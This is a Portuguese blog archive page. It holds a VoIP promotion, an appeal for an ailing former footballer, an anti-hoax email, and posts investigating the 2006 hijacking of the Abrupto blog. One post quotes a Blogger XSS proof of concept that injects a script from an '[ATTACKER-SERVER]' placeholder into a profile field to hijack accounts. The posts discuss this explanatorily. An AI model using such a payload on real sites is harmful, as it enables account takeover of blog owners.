VoipCheap: a única coisa que custa é acreditar



Pelos vistos, o Skype passou à História.

Com o VoipCheap, é possível efectuar chamadas totalmente grátis para telefones convencionais, tanto em Portugal como em muitos outros países; neste momento, num total de 36, dos quais 23 europeus. É possível mesmo estabelecer qualquer chamada directa sem necessidade de instalação do programa; para tal, basta aceder à página principal do VoipCheap e indicar o próprio número de telefone e o de destino da chamada.

Desde que tenha uma ligação de banda larga (cabo ou DSL) e um computador de gama média, pode agora dizer adeus às facturas “dolorosas”. E mais ainda: se quiser ligar para telemóveis (para os USA também isto é grátis), pode comprar créditos com a garantia de que as tarifas por minuto serão sempre (ainda) mais baixas do que as do Skype; aliás, o programa indica em todas as chamadas quanto estaria a gastar se tivesse ligado através da concorrência. Para dar um exemplo, as chamadas para telemóveis em Portugal custam 0,06 € (seis cêntimos mais IVA) por minuto. Para os países não incluídos no tarifário a custo zero, os preços são igualmente ridículos (Macau, 1 cêntimo!).

Depois de fazer o “download“, a instalação é rápida e totalmente automática, ficando assim com uma ferramenta de comunicações valiosa, de manuseamento fácil e intuitivo.

Share

O bom gigante e a gente pequena

PARA: TODA A EQUIPA DO MUNDIAL DE FUTEBOL, JOGADORES E TÉCNICOS;
FEDERAÇÃO PORTUGUESA DE FUTEBOL;
SPORT LISBOA E BENFICA – EUSÉBIO E SIMÕES;
SECRETÁRIO DE ESTADO DO DESPORTO.

MEUS SENHORES:

O Torres está doente, mal de Alzheimer.
Todos sabemos os efeitos terríveis dessa doença.
O Torres tem como único rendimento uma pequena pensão de € 150,00, que provém do tempo em que foi trabalhador numa loja, antes de ser jogador de futebol.
Pois é, como jogador de futebol nunca o glorioso Benfica efectuou quaisquer descontos para a previdência social.

O Sr. Dr. Madaíl, teve o descaramento de pedir a isenção de IRS para toda a equipa do mundial em relação aos prémios. A polémica está, espero, resolvida. Mas o mesmo Sr., poderia pensar em situações como a do Torres.
Milhões e mais milhões, é o que ouvimos quando se fala na selecção “de todos nós”; e não se arranjam uns tostões para homens como o Torres que tanto deram a essa mesma equipa? Lembram-se dos Magriços de 1966? Da melhor classificação até hoje, o 3º lugar? Lembram-se – não, é óbvio que na selecção não se lembram – daquele golo de cabeça do Torres? De termos eliminado países enormes no mundo do futebol, como o Brasil e a U.R.S.S?

E os jogadores e técnicos que hoje ganham fortunas não se lembram desse homem e de outros que eventualmente estejam na mesma situação?
Para eles uma singela sugestão:

Ofereçam 10% dos vossos prémios ao bom gigante, para que a mulher o possa tratar com um mínimo de dignidade e conforto. Pouco ou nada influenciará as vossas finanças, certamente ganharão muitos mais milhões e merecem-nos, para o Torres será um milagre.

Esta sugestão é válida para a F.P.F.; Sr. Dr. Madaíl, um subsídio mensal não afectará a tesouraria da federação e para o Torres será um prémio bem merecido.

E o Benfica?? Milhões e milhões com compras, vendas e ordenados de super luxo para jogadores, técnicos e…dirigentes.

Dar um subsidio mensal ao Torres de uns dois mil euros que importância terá nas contas do Benfica? Presumo que pouca ou nenhuma.
Mas para o Torres será o que disse supra, um milagre, um terminar de vida com o mínimo de dignidade. E o Benfica tem uma divida para com o Torres, sem esquecer que se tivessem sido feitos descontos, a pensão do Torres teria um valor muito diferente. Emendem a mão, antes que seja tarde demais.

Eusébio e Simões: meus senhores, foram colegas do Torres, conhecem a sua desgraça maior que é a terrível doença e nada fazem para mitigar a outra desgraça que é o Torres nem para comer ter dinheiro? Sei que são boas pessoas, devem andar distraídos…a selecção, mais isto e aquilo… façam alguma coisa, falem com os jogadores, façam jogos, façam uma recolha mensal, um pouco a cada um, nada custará e o bom do velho Torres, morrerá, se tal for possível, mais contente por os seus amigos e colegas não se esquecerem dele.

Por último, mas não menos importante:

Sr. Secretário de Estado do Desporto:

Tantos milhões que são gastos, alguns sem sabermos bem onde e como e não existe uma pequena verba para situações como a expendida? Acredito
que sim.
Determine ou proponha um subsídio para o Torres. O país deve-lhe muito. Lembre-se. Parece que jogadores e técnicos receberão um chorudo prémio pelo campeonato que terminou há pouco.
Ora, o Torres contribuiu para o melhor lugar de sempre do futebol Português, o célebre 3º lugar de 66.

Atribua-lhe um merecido subsídio, ele muito precisa e muito merece.

E se todas as entidades referidas aceitarem as sugestões, não pensem que será demais.

E LEMBREM-SE. INFELIZMENTE NÃO SERÁ POR MUITO TEMPO. SERÁ UM ENCARGO PASSAGEIRO.
APRESSEM-SE, NÃO VENHAM DEPOIS DIZER: QUE PENA, ESTAVA QUASE A SER DESPACHADO.

ESPERO QUE ESTE APELO NÃO CAIA EM SACOS ROTOS.

UM PORTUGUÊS QUE TEM MUITA HONRA EM TAL, MAS, EM SITUAÇÕES COMO ESTA TEM PROFUNDA VERGONHA EM SER PORTUGUÊS.

MEUS SENHORES: FAÇAM COM QUE EU E MILHÕES DE PORTUGUESES NÃO TENHAM VERGONHA EM DIZER QUE SÃO PORTUGUESES.

Este apelo foi transcrito exactamente como publicado no blog Pululu.
Imagem de serbenfiquista.com.

Share

A blogosfera está perigosa (IV)

hackers

—————————– Proof Of Concept; —————————
Inject [script src=”http://[ATTACKER-SERVER]/EVIL-JS/”][/script] to victim “First Name”
Now you can execute anything in remote. After login as your victim:

I. You can change password (without old password)
II. You can change e-mail address without any confirmation
III. You can own the victim blogs
—————————————————————————————

Blogger XSS Vulnerability

No primeiro post sobre este assunto, referimos as duas hipóteses mais prováveis para aquilo que sucedia com o blog Abrupto: ou havia manipulação de DNS ou os dados do titular (blog ID, password) tinham sido detectados remotamente. Ambas as hipóteses seriam perfeitamente admissíveis, e existem “ferramentas” específicas para cada uma delas, conforme referido na altura. Dynamic DNS e Ajax, respectivamente e por exemplo, podem servir na perfeição para o efeito e para quem a elas se quiser dedicar.

Porém, arrastando-se a situação – pelos vistos, indefinidamente – e sabendo-se agora mais alguma coisa sobre a natureza do ataque, cumpre corrigir ligeiramente aquelas duas premissas, desde logo eliminando a primeira e acrescentando uma pequena variante à segunda: os dados do titular do blog não terão sido detectados remotamente, mas antes empastelados remotamente. Aliás, foi também esse o termo por nós anteriormente utilizado. A técnica/linguagem conhecida por XSS (Cross Site Scripting), complementada pelo já referido Ajax (basicamente, “HTTP requests“, incluindo “cookie management“), tudo em conjunto permite não apenas este tipo de ataques – no caso vertente, com intuitos meramente publicitários – como outros muitíssimo mais perigosos e destruidores.

Em jeito de balanço, e utilizando um modelo vagamente policial, vejamos o que já temos sobre o assunto e, portanto, aquilo que falta.

Como
Ajax e XSS para penetração esporádica no painel de administração e sequestro da conta Blogger e do endereço Blogspot. Os conteúdos, incluindo cabeçalho e “template”, são escritos através de ficheiros “javascript” (3 a 7 “document.write”).
Quando
Desde o dia 18, os ataques repetem-se sistematicamente pela madrugada em Portugal (03 às 06 horas). O ataque pode ser pré-programado, sem a intervenção sincrónica do “hacker”; este mesmo criou diversos blogs, com conteúdos sempre iguais, que poderão ter resultado de simples experiências com rotinas programáticas.
Onde
A julgar pela diferença horária e localizando o provável titular da conta AdBrite, nos Estados Unidos; o site com publicidade dessa mesma conta está num servidor em La Mesa, California.
Quem
O “hacker” teve, até agora, dois números de utilizador Blogger (31318965 e 31611969) mas a conta AdBrite é sempre a mesma (99246). Tratando-se de utilização abusiva e de apropriação indevida, qualquer uma das entidades (Blogger e AdBrite) está legalmente obrigada a fornecer a identificação do “prevaricador” (a qual, evidentemente, há-de ser falsa).
Porquê
Numa primeira fase, por uma questão de promoção publicitária: o Abrupto tem milhares de visitantes diários, é o maior blog português (nesse aspecto) e um dos mil mais vistos do mundo. Numa segunda fase, a reacção de Pacheco Pereira fez sobressair a vaidade típica deste género de “hacker” e, de certa forma, a sua infantilidade: agora, a coisa transformou-se numa espécie de jogo da “apanhada”.

Estando por certo, neste preciso momento, muita gente a trabalhar no sentido de resolver o problema, não deverá ser muito difícil identificar – ao menos – a fonte do ataque: todos os dados estão disponíveis, como pistas, tanto neste como nos três posts anteriores sobre o mesmo tema. Visto que a Blogger.com não demonstra grande interesse em reconhecer e corrigir esta vulnerabilidade, igualmente não será extremamente penoso, podemos presumir, mudar o blog de endereço e, por conseguinte, para uma plataforma mais segura e tecnicamente mais evoluída. Porque não a WordPress (ver nota) ou a Blogsome (ver nota), por exemplo? Ou, mais evidentemente ainda, porque não um domínio próprio?

A partir das pistas aqui deixadas, qualquer pessoa pode chegar à fonte do problema. No entanto, obviamente, mesmo a identificação do detentor do site de onde – ou em nome de cujo proprietário – os ataques são efectuados, não resultará absolutamente clara. Este género de indivíduos costuma ter muito cuidado com os documentos que assina.

Pela nossa parte, a dedicação de algum tempo a este assunto teve uma motivação exclusiva: identificar para prevenir casos futuros. Além disso, serviu pelas aprendizagens recolhidas. Mas, sinceramente, se me é permitida a opinião, já não há paciência para tanta conversa fiada e para tanta falta de resultados e de decisões, por mais simples ou por mais complexas que sejam. Mesmo relevando a arrogância e a indiferença manifestadas pelo autor daquele blog em particular, em relação a todas as pessoas que tentaram apenas ajudar em alguma coisa. E mesmo que tudo isto esteja completamente errado, a intenção não era com certeza insultar ou prejudicar fosse quem fosse. Que ao menos isso fique bem claro.

I rest my case.

Nota: ambos os endereços “ideais” estão ocupados: 1 e 2. Coincidências…

Imagem de Pravda.ru

Arquivo de algumas das intrusões AQUI.

Share

Solidariedade & Credulidade, S.A.

Sent: Monday, July 24, 2006 6:56 PM
Subject: FALSO –> Re: Esta Bebezinha queimada…

Pessoas,

antes de seguirem o caminho fácil de reenviar tudo o que aparece pela frente, devem dar-se ao trabalho de pesquisar se os factos são ou não verídicos e se o são, se vale a pena continuarem a circular. Estarão a poupar milhões de Euros de custos a pessoas e empresas, tanto em termos de tempo perdido a ler estes e-mails como em termos de recursos gastos na distribuição destes e-mails (largura de banda dos servidores que distribuem e-mails, custo de ligação à Internet, etc.). Consultem estes dois sites para terem uma ideia das consequências:

http://hoaxbusters.ciac.org/HBHoaxInfo.html#risk
http://www.claymania.com/hoaxes.html

Como é hábito, antes de reenviar mails deste género, os quais devemos considerar sempre de origem duvidosa, tento confirmar a veracidade da informação através de dois modos:

– em primeiro lugar, através da consulta ao motor de pesquisa Google (www.google.com), ou em quatro bases de dados abrangentes, duas em português (brasileiras) e as outras em inglês, que contêm imensos boatos/chain-letters, tanto recentes como antigos:

http://www.quatrocantos.com/lendas/index.htm
http://www.infoguerra.com.br/index.php3?secao=boatos
http://www.snopes.com/
http://hoaxbusters.ciac.org/

– em segundo lugar, e no caso de o passo anterior não der resultados, através dos contactos fornecidos no e-mail que recebi.

Neste caso, uma pesquisa no site:

http://www.snopes.com/ 

pelas palavras chave:

burn

demonstrou que trata-se de mais um mail falso. Para mais informações, ver:

http://www.snopes.com/inboxer/medical/kuczma.asp

Este tipo de emails, costuma também ser uma brincadeira ou esquema por parte de empresas que se dedicam a “caçar” mails para depois fazerem publicidade (vejam o texto “CUIDADOS IMPORTANTES AO RECEBER OU ENVIAR E-MAILS” no fim deste e-mail). Eu verifiquei os dados e espero que daqui para a frente, para o bem de todos, vocês o façam também. Perco normalmente uns 3-5 minutos a fazer a verificação e reutilizo este e-mail constantemente (a única coisa que é preciso alterar é as 3 partes anteriores contendo o – site de busca usado, palavras chave e site com informação adicional – que reflectem a pesquisa deste caso) para alertar as pessoas. Se a maioria se desse ao trabalho de perder estes 3-5 minutos tal como eu perdi, 99% das chain letters morreriam praticamente à nascença e milhões de Euros e horas seriam poupados. Pensem nisto e consultem este site para aumentarem o vosso conhecimento sobre as tácticas das cartas correntes/chain leetters falsas:

http://www.udesc.br/reitoria/coinf/suportetecnico/corrente.htm

Mandem este meu e-mail para toda a gente a quem enviaram o anterior bem como para as pessoas que o enviaram a vocês. Vamos tentar quebrar as correntes falsas de modo a que as verdadeiras possam sobreviver (e terminar quando já não fazem sentido continuar!). Até hoje só detectei quatro correntes verdadeiras em várias dezenas e três delas já não faziam sentido continuar a espalhar pois a situação já tinha sido resolvida.

PS: provavelmente não fazem ideia de quem sou e como obtive o vosso endereço de e-mail. Eu poderia ser: ou uma empresa a fazer publicidade, ou um vírus (real) a propagar-se. Para impedir que os nossos endereços se espalhem por mãos alheias apaguem os endereços das mensagens que vocês encaminham e usem os campos Bcc ou Cco do vosso programa/conta de mail (vejam o texto “CUIDADOS IMPORTANTES AO RECEBER OU ENVIAR E-MAILS” no fim deste e-mail).

CUIDADOS IMPORTANTES AO RECEBER OU ENVIAR E-MAILS

Tem gente que envia mensagens contendo todos os endereços dos destinatários e também encaminha mensagens sem apagar os outros endereços das mensagens originais.

Abaixo, a explicação de como isso é utilizado pelas empresas e como  serve para passar vírus. Este alerta é importante para que nossos endereços não sejam reenviados  a  todo mundo.

ATENÇÃO :

Mensagem sobre vírus e crimes, roubo de órgãos, assalto, atentado terrorista, etc. quase sempre são falsas. Isso é um esquema usado pra
propagar o que se chama de SPAM. As correntes  de amizade também ajudam a criar SPAM.

Quando você repassa piadas sem apagar os nomes e endereços anteriores ajuda a espalhar endereços que podem ser indevidamente utilizados. Existem firmas que criam este tipo de e-mail e mandam para algumas pessoas. Essas pessoas espalham o mesmo e-mail pra mais uma quantidade razoável de pessoas  e assim por diante.

A empresa original que criou o e-mail usa um tipo de software especial conhecido como “spider” que corre pela Internet procurando por certas
palavras chaves.

No caso deste e-mail pode ser qualquer combinação de palavras dentro do corpo dele ou mesmo escondida  no “header” (cabeçalho) da mensagem. Uma vez que as “spiders” encontram a  mensagem original (que já foi enviada para várias pessoas) o software  copia os endereços de todo mundo que ficam gravados no “header” da mensagem  e  manda a lista de volta para quem criou o e-mail.

Por que eles fazem  isso?

Porque as listas de endereço são vendidas a um preço alto. Existem  outros programas lá fora que criam listas de endereço e que também são vendidas, mas por um preço mais baixo, porque vão trazer inúmeros  endereços  que não existem, mas as listas criadas pelas “spiders” são todas de  endereços válidos, que ALGUNS INTERNAUTAS convenientemente providenciaram para o software pegar.

Lembre disso quando receber um e-mail que diga a você:

Enviar uma cópia pra todos que você conhece.

Ou então :

Repasse  esta mensagem para 10 pessoas.

A mesma coisa acontece quando você repassa mensagens de amizade ou religiosas. Cada vez que um repassa e deixa os endereços anteriores e
acrescenta os  novos, aumenta a lista que será vendida.

Não há nenhum problema em passar mensagens para várias pessoas, se você apagar os endereços anteriores do corpo do texto e se usar o recurso Cópia Oculta que não mostra os endereços dos destinatários.

Como eu disse antes, isso se chama SPAM, e é um negócio lucrativo.

Aqui eu  apaguei  os endereços mas a mensagem que alguém  me passou veio com 25  endereços no cabeçalho, no PARA (nomes dos destinatários) e mais 32 no texto das mensagens (mensagem original, from… to…) originais e
anteriores.

Imagine só quantos endereços válidos foram criados para serem  vendidos.

Outra coisa, quando receber um e-mail que nao solicitou (normalmente em Inglês) e que no final da mensagem diz que se quiser retirar seu nome ou nao quiser mais receber aquela mensagem, clicar num determinado link, não faça isso, na verdade, aquele e-mail foi enviado aleatoriamente e quando você clicar no link vai confirmar que seu endereço é válido e a partir daquele momento vai começar a receber SPAM.

Coloque um fim no SPAM……

Apague os endereços das
pessoas nas mensagens que encaminha.

Coloque os endereços das pessoas sempre nos campos CCO (Cópia de Carbono Oculta) ou BCC (Blind Carbon Copy)

Isso faz com que cada um que receber sua mensagem  não tenha acesso ao endereço eletrônico das outras e portanto, não possa repassá-los.

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
David Aveiro - http://pagina.de/davidaveiro
INESC - Centro de Engenharia Organizacional - http://ceo.inesc.pt

Ginastica Ocular - Deixe de precisar de lentes e acabe com os seus
problemas da visao naturalmente - http://ginasticaocular.net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Share

A blogosfera está perigosa (III)

A Vida dos Meus Dias
(IN)Certezas
Bola de Vento
McMenu
Memória Inventada (blogspot)
Harmonia do Barulho

Estes são seis exemplos de blogs portugueses cujos endereços foram, de uma forma ou de outra, “tomados” por outros que não os respectivos autores.

O “ataque” ao blog Abrupto, se bem que utilizando estratégia e técnica diferentes daqueles casos, não terá passado por conseguinte de mais uma espécie de brincadeira de mau gosto efectuada por um qualquer “hacker” mais virado para as vendas; num caso pontual e identificável, terá sido o utilizador Blogger com o “user ID” nº 31318965, do qual não existe, obviamente, o mínimo rasto.

A escolha do Abrupto como alvo particular do referido “ataque” ter-se-á certamente ficado a dever ao número de visitantes e de “page views” daquele blog, além das fragilidades e quebras de segurança da plataforma Blogger (assunto recorrente e relativamente antigo), tendo como finalidade única a promoção de uma conta Adbrite do mesmo “hacker”.

Nota: na maior parte dos seis casos apontados, é muito possível que se tenha tratado de simples aproveitamento de endereço que entretanto foi desactivado pelo detentor original.

Share

A blogosfera está perigosa (II)

Um pequeno trabalho ciber-detectivesco sobre o “empastelamento” do Abrupto.

1. Todos os blogs com endereço blogspot.com partilham o mesmo endereço: 66.102.15.101, o que corresponde a blogspot.blogger.com (ou, na prática, a http://www.blogger.com/start).
2. Todos os blogs alojados naquele endereço são administrados por um servidor, evidentemente no mesmo endereço, cujo Netblock Owner é a Google Inc.
3. O único blog (por amostra, foram verificados apenas alguns) que tem mais do que um servidor é, precisamente, o Abrupto.
4. Este segundo servidor, cujo Netblock Owner está identificado como Savvis, está instalado no endereço 216.34.7.189.
5. Este último endereço corresponde não a Savvis.com (216.91.182.78) mas a um subdomínio de blogger.com: http://falstaff.blogger.com.
6. Aparentemente, falstaff.blogger.com não existe (http://216.34.7.189/) nem nunca existiu, apesar de estar referenciado como Netblock Owner do blog “Abrupto” desde 23 de Junho de 2003.
7. O Trace Route daquele endereço, passa de facto pela Savvis mas resulta em “Destination host unreachable”, o que não é lá muito comum.

Falstaff não soa a “false stuff”? Certamente, uma coisa que não existe não parece ser grande homenagem à figura criada por Shakespeare.

Poderá ser este o endereço cujo DNS é trocado com o do “Abrupto” (e, quem sabe, com o de outros blogs) esporadicamente, apenas por algumas horas e por forma a nunca ser rastreado?

Share

A blogosfera está perigosa

Hackers poison DNS
Diverted to hell
By Nick Farrell
Monday 07 March 2005, 08:01

HACKERS HAVE found a way of diverting interweb punters from famous websites to dodgy URLs where they plied with spy and adware.
Security outfit, The Internet Storm Centre, posted a warning about “DNS cache poisoning” on its website on Friday.
It said that it had reports that this particular attack was redirecting traffic from google.com, ebay.com, and weather.com.
Basically the hackers are attacking a domain name server and poisoning the cache by planting counterfeit data in the cache of the name server.
(…)

The Inquirer (ler notícia completa)

Nos últimos dias, foram detectados comportamentos estranhos no acesso a alguns dos blogs portugueses mais conhecidos. Como se vê pela data do extracto da notícia acima (07.03.05), este “fenómeno” não é novo nem exclusivo daqueles endereços mais “mediáticos”, por assim dizer; diversos blogs, nacionais e estrangeiros, sofreram o mesmo tipo de ataque e viram também os seus conteúdos ser substituídos por outros, de forma mais ou menos prolongada, mais ou menos destrutiva.

Existem diversas organizações que se dedicam à defesa da segurança na Internet, e em especial quanto àquilo que diz respeito aos chamados “hackers“. Uma dessas organizações é a Honeynet, da qual existe um ramo português, e que se dedica à monotorização das actividades da pirataria informática ou cibernética, providenciando ao utilizador comum algumas ferramentas de detecção e de protecção.

O que sucedeu recentemente com o blog Abrupto, à semelhança dos outros casos, poderá ter sido, com maior probabilidade, uma de duas coisas: ou houve manipulação de DNS(*), como referido na notícia, ou os dados de identificação do(s) detentor(es) do(s) blog(s) foram detectados remotamente. Para eliminar uma delas, seria necessário estarmos em presença (sincronicamente) da versão pirateada do blog. Poderia também ajudar alguma coisa saber quais os períodos em que esteve on-line a página pirateada e se, nesses períodos, os acessos iriam todos dar a esta, ou se alguns acederiam à página/endereço original.

Pela experiência recente verificada no nosso domínio (cedilha.com), para não ir mais longe, e embora se trate de “acidentes” de características diferentes, dispondo daqueles dados poder-se-ia concluir muita coisa e mesmo, se calhar, isolar o problema (e, no limite, a sua fonte); o empastelamento de DNS poderá ter sido efectuado em apenas alguns servidores e, nesse caso, não tendo havido um registo abusivo de domínio, com a respectiva propagação (altamente improvável), seria possível detectar os canais de acesso seguro… bem como os outros, onde residiria o problema. Ou ainda montar um esquema de acesso alternativo e de recurso como, por exemplo, utilizando o Anonymouse, um “mirror site”, redireccionamento alternativo, etc.

Hoje em dia, existem ferramentas terrivelmente eficazes fabricadas por e destinadas a piratas informáticos. Há programas específicos para detectar e gravar remotamente qualquer “password”, número de cartão de crédito ou de conta bancária (keyboard recording). Não existe nenhum sistema pessoal absolutamente impenetrável ou 100% seguro (com o back orifice, por exemplo).

Todo o cuidado é pouco, portanto; aprender algumas regras de segurança básicas – aliás, como na vida real – e investir em ferramentas adequadas de defesa (pessoal) torna-se cada vez mais indispensável para a sobrevivência neste submundo em que se vai transformando a World Wide Web.

(*) Dynamic DNS Client, por exemplo, é uma forma legal de baralhar e tornar a dar endereços. Serve como ilustração daquilo que se poderá fazer por meios menos legais.

Para quem quiser saber, de forma simples e nada técnica, o que é e para que serve o DNS cache poisoning, deve ler este artigo de James Turnbull, no Ablog.

Share